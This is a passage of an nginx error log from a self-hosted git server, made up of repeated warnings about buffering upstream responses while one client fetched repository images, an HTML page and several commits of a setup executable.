git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" -2026/02/17 14:07:54 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/18/0000014186 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" -2026/02/17 14:08:01 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/18/0000014187 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" -2026/02/17 14:08:08 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/18/0000014188 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" -2026/02/17 14:08:14 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/18/0000014189 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" -2026/02/17 14:08:22 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/19/0000014190 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" -2026/02/17 14:08:32 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/19/0000014191 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" -2026/02/17 14:08:39 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/19/0000014192 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" -2026/02/17 14:08:42 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/19/0000014193 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" -2026/02/17 14:11:10 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/19/0000014194 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" -2026/02/17 14:11:46 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/19/0000014195 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" -2026/02/17 14:12:16 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/19/0000014196 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" -2026/02/17 14:12:50 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/19/0000014197 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:12:58 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/19/0000014198 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 14:13:04 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/19/0000014199 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" -2026/02/17 14:13:10 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/20/0000014200 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" -2026/02/17 14:13:18 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/20/0000014201 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 14:13:26 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/20/0000014202 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" -2026/02/17 14:13:29 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/20/0000014203 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:13:46 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/20/0000014204 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:13:58 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/20/0000014205 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" -2026/02/17 14:14:10 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/20/0000014206 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" -2026/02/17 14:14:17 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/20/0000014207 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" -2026/02/17 14:14:24 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/20/0000014208 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" -2026/02/17 14:14:30 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/20/0000014209 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" -2026/02/17 14:14:37 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/21/0000014210 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 14:14:46 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/21/0000014211 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" -2026/02/17 14:14:49 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/21/0000014212 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" -2026/02/17 14:14:49 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/21/0000014213 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" -2026/02/17 14:14:56 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/21/0000014214 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 14:15:04 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/21/0000014215 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" -2026/02/17 14:15:07 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/21/0000014216 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 14:15:12 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/21/0000014217 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" -2026/02/17 14:15:20 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/21/0000014218 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 14:15:29 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/21/0000014219 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 14:15:32 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/22/0000014220 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:15:38 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/22/0000014221 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 14:15:40 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/22/0000014222 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" -2026/02/17 14:15:41 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/22/0000014223 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:15:48 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/22/0000014224 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 14:15:55 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/22/0000014225 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 14:16:03 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/22/0000014226 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 14:16:07 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/22/0000014227 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET 